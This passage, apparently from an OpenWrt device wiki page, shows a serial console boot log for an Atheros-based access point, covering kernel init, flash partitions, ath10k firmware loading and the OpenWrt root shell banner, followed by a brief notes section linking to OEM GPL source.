Mountpoint-cache hash table entries: 1024 (order: 0, 4096 bytes) [ 0.097994] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 19112604462750000 ns [ 0.108491] futex hash table entries: 256 (order: -1, 3072 bytes) [ 0.115040] pinctrl core: initialized pinctrl subsystem [ 0.121340] NET: Registered protocol family 16 [ 0.131709] PCI host bridge /ahb/apb/pcie-controller@180c0000 ranges: [ 0.138570] MEM 0x0000000010000000..0x0000000011ffffff [ 0.144151] IO 0x0000000000000000..0x0000000000000000 [ 0.163163] PCI host bridge to bus 0000:00 [ 0.167564] pci_bus 0000:00: root bus resource [mem 0x10000000-0x11ffffff] [ 0.174872] pci_bus 0000:00: root bus resource [io 0x0000] [ 0.180803] pci_bus 0000:00: root bus resource [??? 0x00000000 flags 0x0] [ 0.188019] pci_bus 0000:00: No busn resource found for root bus, will use [bus 00-ff] [ 0.196869] pci 0000:00:00.0: BAR 0: assigned [mem 0x10000000-0x101fffff 64bit] [ 0.204661] pci 0000:00:00.0: BAR 6: assigned [mem 0x10200000-0x1020ffff pref] [ 0.214389] clocksource: Switched to clocksource MIPS [ 0.220572] NET: Registered protocol family 2 [ 0.225863] TCP established hash table entries: 1024 (order: 0, 4096 bytes) [ 0.233283] TCP bind hash table entries: 1024 (order: 0, 4096 bytes) [ 0.240086] TCP: Hash tables configured (established 1024 bind 1024) [ 0.246960] UDP hash table entries: 256 (order: 0, 4096 bytes) [ 0.253178] UDP-Lite hash table entries: 256 (order: 0, 4096 bytes) [ 0.260080] NET: Registered protocol family 1 [ 0.267090] Crashlog allocated RAM at address 0x3f00000 [ 0.273631] workingset: timestamp_bits=30 max_order=15 bucket_order=0 [ 0.284359] squashfs: version 4.0 (2009/01/31) Phillip Lougher [ 0.290596] jffs2: version 2.2 (NAND) (SUMMARY) (LZMA) (RTIME) (CMODE_PRIORITY) (c) 2001-2006 Red Hat, Inc. [ 0.308030] io scheduler noop registered [ 0.312200] io scheduler deadline registered (default) [ 0.319468] pinctrl-single 1804002c.pinmux: 544 pins at pa b804002c size 68 [ 0.327751] Serial: 8250/16550 driver, 1 ports, IRQ sharing disabled [ 0.335131] console [ttyS0] disabled [ 0.338960] 18020000.uart: ttyS0 at MMIO 0x18020000 (irq = 9, base_baud = 2500000) is a 16550A [ 0.348165] console [ttyS0] enabled [ 0.348165] console [ttyS0] enabled [ 0.355581] bootconsole [early0] disabled [ 0.355581] bootconsole [early0] disabled [ 0.368966] m25p80 spi0.0: mx25l12805d (16384 Kbytes) [ 0.374131] 5 fixed-partitions partitions found on MTD device spi0.0 [ 0.380612] Creating 5 MTD partitions on "spi0.0": [ 0.385483] 0x000000000000-0x000000040000 : "u-boot" [ 0.391168] 0x000000040000-0x000000050000 : "u-boot-env" [ 0.397209] 0x000000050000-0x000000fa0000 : "firmware" [ 0.437104] 2 uimage-fw partitions found on MTD device firmware [ 0.443122] 0x000000050000-0x0000001da547 : "kernel" [ 0.448767] 0x0000001da547-0x000000fa0000 : "rootfs" [ 0.454354] mtd: device 4 (rootfs) set to be root filesystem [ 0.460174] 1 squashfs-split partitions found on MTD device rootfs [ 0.466464] 0x0000004b0000-0x000000fa0000 : "rootfs_data" [ 0.472528] 0x000000fa0000-0x000000ff0000 : "userconfig" [ 0.478554] 0x000000ff0000-0x000001000000 : "art" [ 0.484862] libphy: Fixed MDIO Bus: probed [ 0.491025] ag71xx 19000000.eth: invalid MAC address, using random address [ 0.836081] libphy: ag71xx_mdio: probed [ 0.935002] ag71xx 19000000.eth: connected to PHY at mdio-bus.0:05 [uid=004dd072, driver=Atheros 8035 ethernet] [ 0.945766] eth0: Atheros AG71xx at 0xb9000000, irq 4, mode: rgmii-rxid [ 0.954218] NET: Registered protocol family 10 [ 0.962065] Segment Routing with IPv6 [ 0.965910] NET: Registered protocol family 17 [ 0.970458] 8021q: 802.1Q VLAN Support v1.8 [ 0.981195] VFS: Mounted root (squashfs filesystem) readonly on device 31:4. [ 0.992790] Freeing unused kernel memory: 1232K [ 0.997405] This architecture does not have kernel memory protection. [ 1.736969] init: Console is alive [ 1.740607] init: - watchdog - [ 2.434428] random: fast init done [ 2.829076] kmodloader: loading kernel modules from /etc/modules-boot.d/* [ 2.955746] kmodloader: done loading kernel modules from /etc/modules-boot.d/* [ 2.964307] init: - preinit - [ 4.287710] random: jshn: uninitialized urandom read (4 bytes read) [ 4.536398] random: jshn: uninitialized urandom read (4 bytes read) [ 4.683473] random: jshn: uninitialized urandom read (4 bytes read) [ 4.894473] IPv6: ADDRCONF(NETDEV_UP): eth0: link is not ready Press the [f] key and hit [enter] to enter failsafe mode Press the [1], [2], [3] or [4] key and hit [enter] to select the debug level [ 8.065627] eth0: link up (1000Mbps/Full duplex) [ 8.070344] IPv6: ADDRCONF(NETDEV_CHANGE): eth0: link becomes ready [ 8.235183] jffs2: notice: (430) jffs2_build_xattr_subsystem: complete building xattr subsystem, 4 of xdatum (2 unchecked, 2 orphan) and 33 of xref (2 dead, 0 orphan) found. [ 8.252933] mount_root: switching to jffs2 overlay [ 8.277783] overlayfs: upper fs does not support tmpfile. [ 8.290934] urandom-seed: Seeding with /etc/urandom.seed [ 8.385545] eth0: link down [ 8.399108] procd: - early - [ 8.402115] procd: - watchdog - [ 8.535644] procd: cannot set group dialout for /dev/ttyS0 [ 9.044487] procd: - watchdog - [ 9.047897] procd: - ubus - [ 9.116928] urandom_read: 5 callbacks suppressed [ 9.116935] random: ubusd: uninitialized urandom read (4 bytes read) [ 9.129890] random: ubusd: uninitialized urandom read (4 bytes read) [ 9.137528] procd: - init - Please press Enter to activate this console. [ 9.636128] kmodloader: loading kernel modules from /etc/modules.d/* [ 9.647792] ip6_tables: (C) 2000-2006 Netfilter Core Team [ 9.660568] Loading modules backported from Linux version v4.19.32-0-g3a2156c839c7 [ 9.668298] Backport generated by backports.git v4.19.32-1-0-g1c4f7569 [ 9.677976] ip_tables: (C) 2000-2006 Netfilter Core Team [ 9.690126] nf_conntrack version 0.5.0 (2048 buckets, 8192 max) [ 9.742328] xt_time: kernel timezone is -0000 [ 9.793634] PPP generic driver version 2.4.2 [ 9.800569] NET: Registered protocol family 24 [ 9.828443] ath10k 4.19 driver, optimized for CT firmware, probing pci device: 0x3c. [ 9.837484] PCI: Enabling device 0000:00:00.0 (0000 -> 0002) [ 9.843374] ath10k_pci 0000:00:00.0: pci irq legacy oper_irq_mode 1 irq_mode 0 reset_mode 0 [ 10.118585] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/fwcfg-pci-0000:00:00.0.txt failed with error -2 [ 10.129294] ath10k_pci 0000:00:00.0: Falling back to user helper [ 10.289590] firmware ath10k!fwcfg-pci-0000:00:00.0.txt: firmware_loading_store: map pages failed [ 10.298780] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/pre-cal-pci-0000:00:00.0.bin failed with error -2 [ 10.309664] ath10k_pci 0000:00:00.0: Falling back to user helper [ 10.490868] firmware ath10k!pre-cal-pci-0000:00:00.0.bin: firmware_loading_store: map pages failed [ 10.502802] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/ct-firmware-5.bin failed with error -2 [ 10.513955] ath10k_pci 0000:00:00.0: Falling back to user helper [ 10.744053] firmware ath10k!QCA988X!hw2.0!ct-firmware-5.bin: firmware_loading_store: map pages failed [ 10.753681] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/ct-firmware-2.bin failed with error -2 [ 10.764826] ath10k_pci 0000:00:00.0: Falling back to user helper [ 10.944249] firmware ath10k!QCA988X!hw2.0!ct-firmware-2.bin: firmware_loading_store: map pages failed [ 10.953898] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-6.bin failed with error -2 [ 10.964781] ath10k_pci 0000:00:00.0: Falling back to user helper [ 11.143272] firmware ath10k!QCA988X!hw2.0!firmware-6.bin: firmware_loading_store: map pages failed [ 11.152632] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-5.bin failed with error -2 [ 11.163510] ath10k_pci 0000:00:00.0: Falling back to user helper [ 11.343050] firmware ath10k!QCA988X!hw2.0!firmware-5.bin: firmware_loading_store: map pages failed [ 11.352432] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-4.bin failed with error -2 [ 11.363315] ath10k_pci 0000:00:00.0: Falling back to user helper [ 11.540730] firmware ath10k!QCA988X!hw2.0!firmware-4.bin: firmware_loading_store: map pages failed [ 11.550095] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/firmware-3.bin failed with error -2 [ 11.560970] ath10k_pci 0000:00:00.0: Falling back to user helper [ 11.739673] firmware ath10k!QCA988X!hw2.0!firmware-3.bin: firmware_loading_store: map pages failed [ 11.948432] ath10k_pci 0000:00:00.0: qca988x hw2.0 target 0x4100016c chip_id 0x043202ff sub 0000:0000 [ 11.957826] ath10k_pci 0000:00:00.0: kconfig debug 0 debugfs 1 tracing 0 dfs 1 testmode 0 [ 11.970227] ath10k_pci 0000:00:00.0: firmware ver 10.1-ct-8x-__fW-022-883e26a8 api 2 features wmi-10.x,has-wmi-mgmt-tx,mfp,txstatus-noack,wmi-1 0.x-CT,ratemask-CT,txrate-CT,get-temp-CT,tx-rc-CT,cust-stats-CT,retry-gt2-CT,txrate2-CT,beacon-cb-CT crc32 7a67ce60 [ 12.021110] ath10k_pci 0000:00:00.0: Direct firmware load for ath10k/QCA988X/hw2.0/board-2.bin failed with error -2 [ 12.031722] ath10k_pci 0000:00:00.0: Falling back to user helper [ 12.123159] firmware ath10k!QCA988X!hw2.0!board-2.bin: firmware_loading_store: map pages failed [ 12.132414] ath10k_pci 0000:00:00.0: board_file api 1 bmi_id N/A crc32 bebc7c08 [ 13.070510] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 13.087967] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 13.094235] ath10k_pci 0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 13.102583] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 24680 iram: 26872' [ 13.173746] ath10k_pci 0000:00:00.0: htt-ver 2.1 wmi-op 2 htt-op 2 cal file max-sta 128 raw 0 hwcrypto 1 [ 13.186560] ath10k_pci 0000:00:00.0: NOTE: Firmware DBGLOG output disabled in debug_mask: 0x10000000 [ 13.430308] ieee80211 phy1: Atheros AR9550 Rev:0 mem=0xb8100000, irq=13 [ 13.474723] kmodloader: done loading kernel modules from /etc/modules.d/* [ 22.986315] br-lan: port 1(eth0) entered blocking state [ 22.991620] br-lan: port 1(eth0) entered disabled state [ 22.997194] device eth0 entered promiscuous mode [ 23.028133] IPv6: ADDRCONF(NETDEV_UP): br-lan: link is not ready [ 26.126181] eth0: link up (1000Mbps/Full duplex) [ 27.073837] ath10k_pci 0000:00:00.0: 10.1 wmi init: vdevs: 16 peers: 127 tid: 256 [ 27.091303] ath10k_pci 0000:00:00.0: wmi print 'P 128 V 8 T 410' [ 27.097624] ath10k_pci 0000:00:00.0: wmi print 'msdu-desc: 1424 sw-crypt: 0 ct-sta: 0' [ 27.106176] ath10k_pci 0000:00:00.0: wmi print 'alloc rem: 24680 iram: 26872' [ 27.177482] ath10k_pci 0000:00:00.0: pdev param 0 not supported by firmware [ 27.192963] IPv6: ADDRCONF(NETDEV_UP): wlan0: link is not ready [ 27.201923] br-lan: port 1(eth0) entered blocking state [ 27.207280] br-lan: port 1(eth0) entered forwarding state [ 27.237489] br-lan: port 2(wlan0) entered blocking state [ 27.242883] br-lan: port 2(wlan0) entered disabled state [ 27.248568] device wlan0 entered promiscuous mode [ 27.259585] IPv6: ADDRCONF(NETDEV_CHANGE): br-lan: link becomes ready [ 27.299689] IPv6: ADDRCONF(NETDEV_UP): wlan1: link is not ready [ 27.363500] br-lan: port 3(wlan1) entered blocking state [ 27.368951] br-lan: port 3(wlan1) entered disabled state [ 27.374676] device wlan1 entered promiscuous mode [ 27.379557] br-lan: port 3(wlan1) entered blocking state [ 27.384982] br-lan: port 3(wlan1) entered forwarding state [ 28.274480] br-lan: port 3(wlan1) entered disabled state [ 34.529617] IPv6: ADDRCONF(NETDEV_CHANGE): wlan1: link becomes ready [ 34.536246] br-lan: port 3(wlan1) entered blocking state [ 34.541653] br-lan: port 3(wlan1) entered forwarding state [ 41.787624] IPv6: ADDRCONF(NETDEV_CHANGE): wlan0: link becomes ready [ 41.794313] br-lan: port 2(wlan0) entered blocking state [ 41.799762] br-lan: port 2(wlan0) entered forwarding state BusyBox v1.30.1 () built-in shell (ash) _______ ________ __ | |.-----.-----.-----.| | | |.----.| |_ | - || _ | -__| || | | || _|| _| |_______|| __|_____|__|__||________||__| |____| |__| W I R E L E S S F R E E D O M ----------------------------------------------------- OpenWrt SNAPSHOT, r9848+27-c8a8294f6e ----------------------------------------------------- root@ap01:/#
Notes
Space for additional notes, links to forum threads or other resources, ...
- OEM Firmware GPL source code: Dropbox